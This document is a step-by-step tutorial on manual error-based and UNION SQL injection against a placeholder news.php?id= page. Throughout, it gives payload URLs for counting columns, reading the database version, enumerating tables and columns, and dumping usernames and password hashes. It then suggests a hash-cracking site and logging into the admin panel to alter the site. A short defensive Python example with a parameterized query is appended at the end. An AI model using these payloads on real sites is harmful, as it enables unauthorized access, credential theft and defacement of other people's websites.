Manual SQL Injection | Error Based
What is SQL injection?
SQL injection is a method used to bypass user authentication on web forms (login portals). An attacker supplies a malicious string to the form, which takes them to the admin area of the website. After gaining access to the admin area, the attacker can add or delete files and alter the website's content.
1. Check for vulnerability
Let's say we have a site like this:
http://www.site.com/news.php?id=1
To test whether it is vulnerable, we append a single quote (') to the end of the URL, which gives:
http://www.site.com/news.php?id=1'
If it is vulnerable, you should get an SQL error such as:
"Sorry: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1" or something like that.
2. Find the number of columns
To find the number of columns we use the ORDER BY clause. It tells the SQL database how to order the result, and we use it to find how many columns the query returns. Type order by 1/* (or order by 1--) and keep increasing the number by one until you get an error.
Example:
http://www.site.com/news.php?id=1 order by 1/* <-- no error
http://www.site.com/news.php?id=1 order by 2/* <-- no error
http://www.site.com/news.php?id=1 order by 3/* <-- no error
http://www.site.com/news.php?id=1 order by 4/* <-- An error
This means there are only 3 columns, because we got an error after order by 3.
3. Check for UNION function
The UNION operator combines the results of two SELECT statements, which lets us display data from the tables or columns we choose.
Example:
http://www.site.com/news.php?id=1 union all select 1,2,3/*
or (either form gives the same result):
http://www.site.com/news.php?id=1 union all select 1,2,3--
(We know there are 3 columns.) If you see numbers on the page, the UNION query is working. Try -- in place of /* if the query doesn't give any result.
4. Check for MySQL version
If the page displays, say, the number 1, that position is where we insert @@version or version() (both return the version of the database).
Example:
http://www.site.com/news.php?id=1 union all select @@version,2,3/*
You may get errors of the kind "Illegal mix of collations (IMPLICIT + COERCIBLE)". If you get such an error with the query above, you need to convert the value, for example with the convert() function or, as in the example below, with unhex(hex()).
Example:
http://www.site.com/news.php?id=1 union all select unhex(hex(@@version)),2,3/*
5. Getting table and column name
-- If the MySQL version is < 5 (e.g. 4.1.33, 4.1.12, ...)
In most cases we need to guess table names. Some common ones to try: user, admin, member, username, usr, user_name, password, pass, passwd, pwd, etc.
Example:
http://www.site.com/news.php?id=1 union all select 1,2,3 from admin/*
If we see any number (1, 2 or 3) on the page, we conclude that the table admin exists in the database. Now check the column names.
Example(find username):
http://www.site.com/news.php?id=1 union all select 1,username,3 from admin/*
If you get an error the column doesn't exist.
If it works, you will see a username displayed on the page, for example admin or superadmin.
Example(finding password):
http://www.site.com/news.php?id=1 union all select 1,password,3 from admin/*
If you get an error, the column doesn't exist. If it worked, you will see a password on the page, either as a hash or in plain text. To show several values at once, join them with the concat() function, which concatenates the strings selected by your query.
Example:
http://www.site.com/news.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*
(0x3a is the hex code for a colon; you could also use the ASCII value of the colon, taken from an ASCII table.) If it worked, you will see the usernames and passwords in the form username:password. Some admins rename the columns, but you can query mysql.user instead.
Example:
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
-- If the MySQL version is >= 5
Find table names
We use table_name and information_schema.tables for this purpose.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*
Here we replace our number 2 with table_name to get the first table from information_schema.tables.
If that does not give a result, we add LIMIT to the end of the query to list the tables one by one.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
We change limit 0,1 to limit 1,1 to view the 2nd table.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table will be displayed.
We use limit 2,1 to get the 3rd table.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
We keep increasing the offset by one until we get something useful like db_admin, poll_user, auth, auth_user, etc.
Find Column names:
Here we use column_name and information_schema.columns.
Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column will be displayed.
Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column will be displayed.
We use limit 2,1 to get the 3rd column.
Example(Finding Password):
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
You will get the output in the format user:password(or hash):email
example:
admin:hash:whatever@blabla.com
Now you see the username, e-mail and password hash on the web page.
Just copy the password hash and use one of the hash cracking sites to crack it.
I recommend http://md5decrypter.co.uk/
Now find the login page of the site. Suppose I have
http://www.site.com/admin/login.php
Now enter the username and password and you have access to the admin panel. Now just play with the website content... Ha ha ha
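The whole walkthrough rests on one bug in news.php: the ?id= value is pasted into the SQL string, so the quote in step 1 breaks the query and the UNION in step 3 appends rows from another table. The following is an added example, not code from the original post; it uses an in-memory SQLite database as a stand-in for MySQL (assumption) with a constructed news and admin table, and shows the concatenating query next to a parameterized one that treats the same payload as a plain value.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the tutorial's backend (assumption: SQLite, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'first article');
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'HASH_PLACEHOLDER');
    """)  # HASH_PLACEHOLDER is a constructed value, not a real hash
    return conn


def fetch_news_vulnerable(conn, id_param):
    """The pattern the tutorial exploits: the raw ?id= value is pasted into the SQL."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def fetch_news_parameterized(conn, id_param):
    """Hardened version: validate the type, then bind the value as a parameter."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []  # a quote or a UNION keyword never reaches the SQL parser
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id=?", (news_id,)).fetchall()


def probe_error(conn, id_param):
    """Returns the database error text that step 1 of the tutorial looks for, or None.
    Echoing this text to the page is what makes the injection 'error based'."""
    try:
        fetch_news_vulnerable(conn, id_param)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def demo():
    conn = make_db()
    err = probe_error(conn, "1'")  # step 1: stray quote breaks the concatenated query
    # step 3 payload, three columns to match the news table
    payload = "1 union all select 1,username,password from admin--"
    leaked = fetch_news_vulnerable(conn, payload)   # admin row appended to the result
    safe = fetch_news_parameterized(conn, payload)  # rejected: not an integer
    return err, leaked, safe


if __name__ == "__main__":
    for label, value in zip(("error", "vulnerable", "parameterized"), demo()):
        print(label + ":", value)
```

Logging the rejected input in fetch_news_parameterized (rather than silently returning nothing) gives the defender the detection signal that the probe in step 1 otherwise hands to the attacker.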